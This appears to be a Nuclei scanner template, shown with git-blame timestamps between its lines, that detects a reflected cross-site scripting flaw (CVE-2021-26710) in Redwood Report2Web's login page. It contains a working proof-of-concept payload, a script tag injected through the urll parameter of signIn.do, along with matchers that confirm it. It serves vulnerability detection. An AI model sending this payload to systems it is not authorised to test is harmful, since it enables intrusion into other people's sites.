2021-02-09 12:58:32 +00:00
id : CVE-2021-26710
info :
name : Redwood v4.3.4.5-v4.5.3 XSS
author : pikpikcu
severity : medium
2021-03-24 06:48:11 +00:00
description : A cross-site scripting (XSS) issue in the login panel in Redwood Report2Web 4.3.4.5 and 4.5.3 allows remote attackers to inject JavaScript via the signIn.do urll parameter.
2022-04-22 10:38:41 +00:00
reference :
- https://vict0ni.me/report2web-xss-frame-injection.html
2022-05-17 09:18:12 +00:00
- https://vict0ni.me/redwood-report2web-xss-and-frame-injection/
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-26710
cwe-id : CWE-79
2022-04-22 10:38:41 +00:00
tags : cve,cve2021,redwood,xss
2021-02-09 12:58:32 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "><script>alert(document.domain)</script>"
part : body
- type : word
words :
- "text/html"
part : header